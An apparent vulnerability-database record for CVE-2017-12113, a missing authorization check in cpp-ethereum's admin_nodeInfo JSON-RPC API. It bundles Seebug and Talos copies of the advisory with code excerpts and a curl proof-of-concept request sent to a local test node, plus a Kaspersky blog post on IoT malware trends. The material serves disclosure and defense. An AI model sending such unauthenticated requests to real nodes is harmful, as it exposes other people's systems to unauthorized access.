ID CVE-2017-12113 Type cve Reporter cve@mitre.org Modified 2019-10-03T00:03:00
Description
An exploitable improper authorization vulnerability exists in admin_nodeInfo API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to trigger this vulnerability.
{"seebug": [{"lastseen": "2018-01-10T18:33:14", "description": "### Summary\r\nAn exploitable improper authorization vulnerability exists in admin_nodeInfo API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass.\r\nAn attacker can send JSON to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nEthereum commit 4e1015743b95821849d001618a7ce82c7c073768\r\n\r\n### Product URLs\r\nhttp://cpp-ethereum.org\r\n\r\n### CVSSv3 Score\r\n4.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N\r\n\r\n### CWE\r\nCWE-285: Improper Authorization\r\n\r\n### Details\r\nCPP-Ethereum is a C++ ethereum client, one of the 3 most popular clients for the ethereum platform. \r\n\r\nOne of the components that is part of cpp-ethereum is a JSON-RPC server which exposes various APIs to manage client/node functionality. Improper authorization checks in the implementation of the `admin_nodeInfo` API allows a remote attacker without any credentials to triggers functionality reserved only for a user with administrator privileges. We can observe a similar approach in two other clients (lack of any kind of authorization) but in this case the situation is exacerbated by the fact that:\r\n```\r\n- By default interface is bound to 0.0.0.0, which means it\u2019s exposed to the world\r\n- The Content-Type set to \u2018application/json\u2019 during requests is not enforced, which means that even if eth JSON-RPC daemon is ran on machine behind a NAT \r\n the JSON-RPC APIs can still be easily triggered by CSRF or SSRF attacks.\r\n- older version of the same API had implemented an authorization check\r\n- there is no visible option to change the default JSON-RPC interface to localhost\r\n```\r\n\r\nFor comparison let us take geth (the go ethereum client) which also implements a JSON-RPC interface but using much better security practices:\r\n```\r\n- by default the interface is bound to localhost\r\n- The \u201cContent-Type\u201d request header value must be set to \u2018application/json\u2019 \r\n- CORS settings are set to block by default all \"cross-domain\" requests\r\n```\r\n\r\nLet us take a look at `admin_nodeInfo` and describe in details improper/consistency check of authorization.\r\n```\r\nLine 55 Json::Value AdminNet::admin_nodeInfo()\r\nLine 56 {\r\nLine 57 Json::Value ret;\r\nLine 58 p2p::NodeInfo i = m_network.nodeInfo();\r\nLine 59 ret[\"name\"] = i.version;\r\nLine 60 ret[\"ports\"] = Json::objectValue;\r\nLine 61 // Both ports are equal as of 2016-02-04, migt change later\r\nLine 62 ret[\"ports\"][\"discovery\"] = i.port;\r\nLine 63 ret[\"ports\"][\"listener\"] = i.port;\r\nLine 64 ret[\"ip\"] = i.address;\r\nLine 65 ret[\"listenAddr\"] = i.address + \":\" + toString(i.port);\r\nLine 66 ret[\"id\"] = i.id.hex();\r\nLine 67 ret[\"enode\"] = i.enode();\r\nLine 68 ret[\"protocols\"] = Json::objectValue;\r\nLine 69 ret[\"protocols\"][\"eth\"] = Json::objectValue; //@todo fill with information\r\nLine 70 return ret;\r\nLine 71 }\r\nLine 72\r\n```\r\n\r\nAs we can see there is no check for calling user privileges which is done in couple other APIs via `RPC_ADMIN` macro. Same functionality is exposed over `admin_net_nodeInfo` API where at the beginning of API body, privileges check is made:\r\n```\r\nLine 41 Json::Value AdminNet::admin_net_nodeInfo(std::string const& _session)\r\nLine 42 {\r\nLine 43 RPC_ADMIN;\r\nLine 44 Json::Value ret;\r\nLine 45 p2p::NodeInfo i = m_network.nodeInfo();\r\nLine 46 ret[\"name\"] = i.version;\r\nLine 47 ret[\"port\"] = i.port;\r\nLine 48 ret[\"address\"] = i.address;\r\nLine 49 ret[\"listenAddr\"] = i.address + \":\" + toString(i.port);\r\nLine 50 ret[\"id\"] = i.id.hex();\r\nLine 51 ret[\"enode\"] = i.enode();\r\nLine 52 return ret;\r\nLine 53 }\r\n```\r\n\r\nWe are aware that this client is not recommended for mining and that the mentioned functionality related with the administrator interface is turned off by default. However when enabled the default behavior is insecure and can allow a remote attacker to perform unauthenticated RPC requests.\r\n\r\n### Crash Information\r\n```\r\nicewall@ubuntu:~/bugs/cpp-ethereum/build/eth$ ./eth -j --ipc --private 123 --no-discovery --datadir `pwd`/data --config config.json --admin-via-http \r\ncpp-ethereum, a C++ Ethereum client\r\ncpp-ethereum 1.3.0\r\n By cpp-ethereum contributors, (c) 2013-2016.\r\n See the README for contributors and credits.\r\nNetworking disabled. To start, use netstart or pass --bootstrap or a remote host.\r\nJSONRPC Admin Session Key: Zt9zxSANHZs=\r\n \u2139 03:09:10 AM.197|miner0 Loading full DAG of seedhash: #00000000\u2026\r\n \u2139 03:09:10 AM.978|miner0 Full DAG loaded\r\n\r\nicewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{\"jsonrpc\":\"2.0\",\"method\":\"admin_nodeInfo\",\"params\":[],\"id\":1}' localhost:8545 \r\n{\"id\":1,\"jsonrpc\":\"2.0\",\"result\":{\"enode\":\"enode://d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517@0.0.0.0:0\",\"id\":\"d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517\",\"ip\":\"0.0.0.0\",\"listenAddr\":\"0.0.0.0:0\",\"name\":\"eth/v1.3.0/Linux/g++/Interpreter/RelWithDebInfo/4e101574/\",\"ports\":{\"discovery\":0,\"listener\":0},\"protocols\":{\"eth\":{}}}}\r\nicewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{\"jsonrpc\":\"2.0\",\"method\":\"admin_nodeInfo\",\"params\":[],\"id\":1}' localhost:8545 | python -m json.tool\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 558 100 496 100 62 98k 12668 --:--:-- --:--:-- --:--:-- 121k\r\n{\r\n \"id\": 1,\r\n \"jsonrpc\": \"2.0\",\r\n \"result\": {\r\n \"enode\": \"enode://d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517@0.0.0.0:0\",\r\n \"id\": \"d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517\",\r\n \"ip\": \"0.0.0.0\",\r\n \"listenAddr\": \"0.0.0.0:0\",\r\n \"name\": \"eth/v1.3.0/Linux/g++/Interpreter/RelWithDebInfo/4e101574/\",\r\n \"ports\": {\r\n \"discovery\": 0,\r\n \"listener\": 0\r\n },\r\n \"protocols\": {\r\n \"eth\": {}\r\n }\r\n }\r\n}\r\n```\r\n\r\n### Timeline\r\n* 2017-12-06 - Vendor Disclosure\r\n* 2017-01-09 - Public Release", "published": "2018-01-10T00:00:00", "title": "CPP-Ethereum JSON-RPC admin_nodeInfo improper authorization Vulnerability(CVE-2017-12113)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12113"], "modified": "2018-01-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97067", "id": "SSV:97067", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "talos": [{"lastseen": "2020-07-01T21:24:54", "bulletinFamily": "info", "cvelist": ["CVE-2017-12113"], "description": "# Talos Vulnerability Report\n\n### TALOS-2017-0465\n\n## CPP-Ethereum JSON-RPC admin_nodeInfo improper authorization Vulnerability\n\n##### January 9, 2018\n\n##### CVE Number\n\nCVE-2017-12113 \n\n### Summary\n\nAn exploitable improper authorization vulnerability exists in admin_nodeInfo API of cpp-ethereum\u2019s JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. \nAn attacker can send JSON to trigger this vulnerability.\n\n### Tested Versions\n\nEthereum commit 4e1015743b95821849d001618a7ce82c7c073768\n\n### Product URLs\n\n<http://cpp-ethereum.org>\n\n### CVSSv3 Score\n\n4.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N\n\n### CWE\n\nCWE-285: Improper Authorization\n\n### Details\n \n \n CPP-Ethereum is a C++ ethereum client, one of the 3 most popular clients for the ethereum platform. One of the components that is part of cpp-ethereum is a JSON-RPC server which exposes various APIs to manage client/node functionality. Improper authorization checks in the implementation of the `admin_nodeInfo` API allows a remote attacker without any credentials to triggers functionality reserved only for a user with administrator privileges. We can observe a similar approach in two other clients (lack of any kind of authorization) but in this case the situation is exacerbated by the fact that:\n \n -\tBy default interface is bound to 0.0.0.0, which means it\u2019s exposed to the world\n -\tThe Content-Type set to \u2018application/json\u2019 during requests is not enforced, which means that even if eth JSON-RPC daemon is ran on machine behind a NAT \n \tthe JSON-RPC APIs can still be easily triggered by CSRF or SSRF attacks.\n -\tolder version of the same API had implemented an authorization check\n -\tthere is no visible option to change the default JSON-RPC interface to localhost\n \n\nFor comparison let us take geth (the go ethereum client) which also implements a JSON-RPC interface but using much better security practices: \\- by default the interface is bound to localhost \\- The \u201cContent-Type\u201d request header value must be set to \u2018application/json\u2019 \\- CORS settings are set to block by default all \u201ccross-domain\u201d requests\n\nLet us take a look at `admin_nodeInfo` and describe in details improper/consistency check of authorization.\n \n \n Line 55\tJson::Value AdminNet::admin_nodeInfo()\n Line 56\t{\n Line 57\t\tJson::Value ret;\n Line 58\t\tp2p::NodeInfo i = m_network.nodeInfo();\n Line 59\t\tret[\"name\"] = i.version;\n Line 60\t\tret[\"ports\"] = Json::objectValue;\n Line 61\t\t// Both ports are equal as of 2016-02-04, migt change later\n Line 62\t\tret[\"ports\"][\"discovery\"] = i.port;\n Line 63\t\tret[\"ports\"][\"listener\"] = i.port;\n Line 64\t\tret[\"ip\"] = i.address;\n Line 65\t\tret[\"listenAddr\"] = i.address + \":\" + toString(i.port);\n Line 66\t\tret[\"id\"] = i.id.hex();\n Line 67\t\tret[\"enode\"] = i.enode();\n Line 68\t\tret[\"protocols\"] = Json::objectValue;\n Line 69\t\tret[\"protocols\"][\"eth\"] = Json::objectValue; //@todo fill with information\n Line 70\t\treturn ret;\n Line 71\t}\n Line 72\n \n\nAs we can see there is no check for calling user privileges which is done in couple other APIs via `RPC_ADMIN` macro. Same functionality is exposed over `admin_net_nodeInfo` API where at the beginning of API body, privileges check is made:\n \n \n Line 41\tJson::Value AdminNet::admin_net_nodeInfo(std::string const& _session)\n Line 42\t{\n Line 43\t\tRPC_ADMIN;\n Line 44\t\tJson::Value ret;\n Line 45\t\tp2p::NodeInfo i = m_network.nodeInfo();\n Line 46\t\tret[\"name\"] = i.version;\n Line 47\t\tret[\"port\"] = i.port;\n Line 48\t\tret[\"address\"] = i.address;\n Line 49\t\tret[\"listenAddr\"] = i.address + \":\" + toString(i.port);\n Line 50\t\tret[\"id\"] = i.id.hex();\n Line 51\t\tret[\"enode\"] = i.enode();\n Line 52\t\treturn ret;\n Line 53\t}\n \n\nWe are aware that this client is not recommended for mining and that the mentioned functionality related with the administrator interface is turned off by default. However when enabled the default behavior is insecure and can allow a remote attacker to perform unauthenticated RPC requests.\n\n### Crash Information\n \n \n icewall@ubuntu:~/bugs/cpp-ethereum/build/eth$ ./eth -j --ipc --private 123 --no-discovery --datadir `pwd`/data --config config.json --admin-via-http \n cpp-ethereum, a C++ Ethereum client\n cpp-ethereum 1.3.0\n By cpp-ethereum contributors, (c) 2013-2016.\n See the README for contributors and credits.\n Networking disabled. To start, use netstart or pass --bootstrap or a remote host.\n JSONRPC Admin Session Key: Zt9zxSANHZs=\n \u2139 03:09:10 AM.197|miner0 Loading full DAG of seedhash: #00000000\u2026\n \u2139 03:09:10 AM.978|miner0 Full DAG loaded\n \n icewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{\"jsonrpc\":\"2.0\",\"method\":\"admin_nodeInfo\",\"params\":[],\"id\":1}' localhost:8545 \n {\"id\":1,\"jsonrpc\":\"2.0\",\"result\":{\"enode\":\"enode://d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517@0.0.0.0:0\",\"id\":\"d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517\",\"ip\":\"0.0.0.0\",\"listenAddr\":\"0.0.0.0:0\",\"name\":\"eth/v1.3.0/Linux/g++/Interpreter/RelWithDebInfo/4e101574/\",\"ports\":{\"discovery\":0,\"listener\":0},\"protocols\":{\"eth\":{}}}}\n icewall@ubuntu:~/bugs/cpp-ethereum$ curl -X POST --data '{\"jsonrpc\":\"2.0\",\"method\":\"admin_nodeInfo\",\"params\":[],\"id\":1}' localhost:8545 | python -m json.tool\n % Total % Received % Xferd Average Speed Time Time Time Current\n \t\t\t\t\t\t\t\t Dload Upload Total Spent Left Speed\n 100 558 100 496 100 62 98k 12668 --:--:-- --:--:-- --:--:-- 121k\n {\n \t\"id\": 1,\n \t\"jsonrpc\": \"2.0\",\n \t\"result\": {\n \t\t\"enode\": \"enode://d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517@0.0.0.0:0\",\n \t\t\"id\": \"d5e35f06f262f06f407d99d88877e702dee066ce8067058087f4bafa52ce1f12002569a7c8ea02583da7fd9e532c88c847ff7d8a5cc148771221721fd224b517\",\n \t\t\"ip\": \"0.0.0.0\",\n \t\t\"listenAddr\": \"0.0.0.0:0\",\n \t\t\"name\": \"eth/v1.3.0/Linux/g++/Interpreter/RelWithDebInfo/4e101574/\",\n \t\t\"ports\": {\n \t\t\t\"discovery\": 0,\n \t\t\t\"listener\": 0\n \t\t},\n \t\t\"protocols\": {\n \t\t\t\"eth\": {}\n \t\t}\n \t}\n }\n \n\n### Timeline\n\n2017-12-06 - Vendor Disclosure \n2017-01-09 - Public Release\n\n##### Credit\n\nDiscovered by Marcin 'Icewall' Noga of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2017-0464\n\nPrevious Report\n\nTALOS-2017-0508\n", "edition": 8, "modified": "2018-01-09T00:00:00", "published": "2018-01-09T00:00:00", "id": "TALOS-2017-0465", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0465", "title": "CPP-Ethereum JSON-RPC admin_nodeInfo improper authorization Vulnerability", "type": "talos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2018-09-28T10:13:53", "bulletinFamily": "blog", "cvelist": ["CVE-2014-8361", "CVE-2017-12113", "CVE-2017-7240", "CVE-2018-1000049", "CVE-2018-10088", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-7445"], "description": "\n\nCybercriminals' interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn't bode well for the years ahead.\n\nWe decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.\n\n_Number of malware samples for IoT devices in Kaspersky Lab's collection, 2016-2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153718/en-iot-malware-collection.png>)\n\nOne of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/>) than all other types combined.\n\n**service** | **% of attacks** \n---|--- \n**Telnet** | 75.40% \n**SSH** | 11.59% \n**other** | 13.01% \n \nWhen it came to downloading malware onto IoT devices, cybercriminals' preferred option was one of the [Mirai](<https://securelist.com/is-mirai-really-as-black-as-its-being-painted/76954/>) family (20.9%).\n\n**#** | **downloaded malware** | **% of attacks** \n---|---|--- \n**1** | Backdoor.Linux.Mirai.c | 15.97% \n**2** | Trojan-Downloader.Linux.Hajime.a | 5.89% \n**3** | Trojan-Downloader.Linux.NyaDrop.b | 3.34% \n**4** | Backdoor.Linux.Mirai.b | 2.72% \n**5** | Backdoor.Linux.Mirai.ba | 1.94% \n**6** | Trojan-Downloader.Shell.Agent.p | 0.38% \n**7** | Trojan-Downloader.Shell.Agent.as | 0.27% \n**8** | Backdoor.Linux.Mirai.n | 0.27% \n**9** | Backdoor.Linux.Gafgyt.ba | 0.24% \n**10** | Backdoor.Linux.Gafgyt.af | 0.20% \n \n_Top 10 malware downloaded onto infected IoT device following a successful Telnet password crack_\n\nAnd here are the Top 10 countries from which our traps were hit by Telnet password attacks:\n\n_Geographical distribution of the number of infected devices, Q2 2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153651/en-map-infected-devices-q2-2018.png>)\n\nAs we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 \u2013 July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.\n\nSince some smart device owners change the default Telnet password to one that is more complex, and many gadgets don't support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.\n\nAn example of the use of \"alternative technology\" is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:\n\n * [Vulnerabilities in D-Link 850L router firmware](<https://blogs.securiteam.com/index.php/archives/3364>)\n * [Vulnerabilities in GoAhead IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>)\n * [Vulnerabilities in MVPower CCTV cameras](<https://www.pentestpartners.com/security-blog/pwning-cctv-cameras/>)\n * [Vulnerability in Netgear ReadyNAS Surveillance](<https://blogs.securiteam.com/index.php/archives/3409>)\n * [Vulnerability in Vacron NVR](<https://blogs.securiteam.com/index.php/archives/3445>)\n * [Vulnerability in Netgear DGN devices](<http://seclists.org/bugtraq/2013/Jun/8>)\n * [Vulnerabilities in Linksys E1500/E2500 routers](<http://www.s3cur1ty.de/m1adv2013-004>)\n * [Vulnerabilities in D-Link DIR-600 and DIR 300 - HW rev B1 routers](<http://www.s3cur1ty.de/m1adv2013-003>)\n * Vulnerabilities in AVTech devices\n\nAdvantages of this distribution method over password cracking:\n\n * Infection occurs much faster\n * It is much harder to patch a software vulnerability than change a password or disable/block the service\n\nAlthough this method is more difficult to implement, it found favor with many virus writers, and it wasn't long before new Trojans exploiting known vulnerabilities in smart device software started appearing.\n\n## New attacks, old malware\n\nTo see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:\n\n**Service** | **Port** | **% of attacks** | **Attack vector** | **Malware families** \n---|---|---|---|--- \n**Telnet** | 23, 2323 | 82.26% | Bruteforce | Mirai, Gafgyt \n**SSH** | 22 | 11.51% | Bruteforce | Mirai, Gafgyt \n**Samba** | 445 | 2.78% | EternalBlue, EternalRed, CVE-2018-7445 | - \n**tr-069** | 7547 | 0.77% | [RCE in TR-069 implementation](<https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/>) | Mirai, Hajime \n**HTTP** | 80 | 0.76% | Attempts to exploit vulnerabilities in a web server or crack an admin console password | - \n**winbox (RouterOS)** | 8291 | 0.71% | [Used for RouterOS (MikroTik) authentication](<https://xakep.ru/2018/03/29/hajime-hunts-mikrotik/>) and [WinBox-based attacks](<https://threatpost.ru/mikrotik-patched-zero-day-vulnerability-in-record-time/25811/>) | Hajime \n**Mikrotik http** | 8080 | 0.23% | RCE in MikroTik RouterOS < 6.38.5 [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**MSSQL** | 1433 | 0.21% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | - \n**GoAhead httpd** | 81 | 0.16% | [RCE in GoAhead IP cameras](<http://blog.netlab.360.com/a-new-threat-an-iot-botnet-scanning-internet-on-port-81-en/>) | Persirai, Gafgyt \n**Mikrotik http** | 8081 | 0.15% | [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**Etherium JSON-RPC** | 8545 | 0.15% | [Authorization bypass (CVE-2017-12113)](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0465>) | - \n**RDP** | 3389 | 0.12% | Bruteforce | - \n**XionMai uc-httpd** | 8000 | 0.09% | [Buffer overflow (CVE-2018-10088) in XionMai uc-httpd 1.0.0 (some Chinese-made devices)](<https://www.bleepingcomputer.com/news/security/all-that-port-8000-traffic-this-week-yeah-thats-satori-looking-for-new-bots/>) | Satori \n**MySQL** | 3306 | 0.08% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | - \n \nThe vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven't seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) and the Monero cryptocurrency miner [EternalMiner](<https://securelist.com/sambacry-is-coming/78674/>).\n\nHere's the breakdown of possible infected IoT devices that replies on the IPs that attacked our honeypots in Q2 2018:\n\nDevice | **% of infected devices** \n---|--- \n**MikroTik** | 37.23% \n**TP-Link** | 9.07% \n**SonicWall** | 3.74% \n**AV tech** | 3.17% \n**Vigor** | 3.15% \n**Ubiquiti** | 2.80% \n**D-Link** | 2.49% \n**Cisco** | 1.40% \n**AirTies** | 1.25% \n**Cyberoam** | 1.13% \n**HikVision** | 1.11% \n**ZTE** | 0.88% \n**Unspecified device** | 0.68% \n**Unknown DVR** | 31.91% \n| \n \nAs can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. ~~What's interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) [CVE-2017-7240](<https://nvd.nist.gov/vuln/detail/CVE-2017-7240>) vulnerability in PST10 WebServer, which is used in their firmware.~~1\n\n### Port 7547\n\nAttacks against remote device management ([TR-069](<https://en.wikipedia.org/wiki/TR-069>) specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. And that's despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.\n\nAnother type of attack exploits the [Chimay-Red vulnerability](<https://wikileaks.org/ciav7p1/cms/page_16384604.html>) in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.\n\n### IP cameras\n\nIP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.\n\nOn June 8, 2018, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/>) was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking [GPON routers](<http://blog.netlab.360.com/gpon-exploit-in-the-wild-ii-satori-botnet-en/>).\n\n## New malware and threats to end users\n\n### DDoS attacks\n\nAs before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.\n\nThis is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often by \"cured\" with a simple reboot.\n\n### Cryptocurrency mining\n\nAnother type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.\n\nA more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:\n\n * At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular: \n * [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) \u2013 RCE in the miniigd SOAP service in Realtek SDK\n * [CVE 2017-17215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE%202017-17215>) \u2013 RCE in the firmware of Huawei HG532 routers\n * [CVE-2018-10561](<https://nvd.nist.gov/vuln/detail/CVE-2018-10561>), [CVE-2018-10562](<https://nvd.nist.gov/vuln/detail/CVE-2018-10562>) \u2013 authorization bypass and execution of arbitrary commands on Dasan GPON routers\n * [CVE-2018-10088](<https://nvd.nist.gov/vuln/detail/CVE-2018-10088>) \u2013 buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers\n * Using compromised routers and the [CVE-2018-1000049](<https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/>) vulnerability in the [Claymore](<https://www.dualminer.ru/>) Etherium miner remote management tool, they substitute the wallet address for their own.\n\n### Data theft\n\nThe [VPNFilter](<https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/>) Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals' server. Here are the main features of VPNFilter:\n\n * Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject javascript code into intercepted web pages.\n * Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.\n * Uses TOR for communication with C&C.\n * Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.\n\nThe Trojan's distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.\n\nThe very [first VPNFilter report](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:\n\n * ASUS\n * D-Link\n * Huawei\n * Linksys\n * MikroTik\n * Netgear\n * QNAP\n * TP-Link\n * Ubiquiti\n * Upvel\n * ZTE\n\nThe situation is made worse by the fact that these manufacturers' devices are used not only in corporate networks, but often as home routers.\n\n### Conclusion\n\nSmart devices are on the rise, with [some forecasts](<https://www.statista.com/statistics/764026/number-of-iot-devices-in-use-worldwide/>) suggesting that by 2020 their number will exceed the world's population several times over. Yet manufacturers still don't prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).\n\nMalware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.\n\nHere are some simple tips to help minimize the risk of smart device infection:\n\n * Don't give access to the device from an external network unless absolutely necessary\n * Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)\n * Regularly check for new firmware versions and update the device\n * Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters\n * Change the factory passwords at initial setup (even if the device does not prompt you to do so)\n * Close/block unused ports, if there is such an option. For example, if you don't connect to the router via Telnet (port TCP:23), it's a good idea to disable it so as to close off a potential loophole to intruders.\n\n \n\n* * *\n\n1 \u2014 The previous version of the text incorrectly stated that Kaspersky Lab honeypots, used for detecting botnets, were attacked by 33 Miele dishwashers.\n\nA Miele representative shared new details with us so we could review our earlier findings. \n\nWe understand that connection attempts were performed by other objects from the networks that presented the targeted IP-addresses \u2013 including, but not limited to, a router or another device within the network.\n\nWe would like to thank the company for bringing this to our attention and being able to clarify our findings. We apologize for any confusion caused.", "modified": "2018-09-18T10:00:36", "published": "2018-09-18T10:00:36", "id": "SECURELIST:2F75371B5752C888430A598DF749FD1A", "href": "https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/", "type": "securelist", "title": "New trends in the world of IoT threats", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
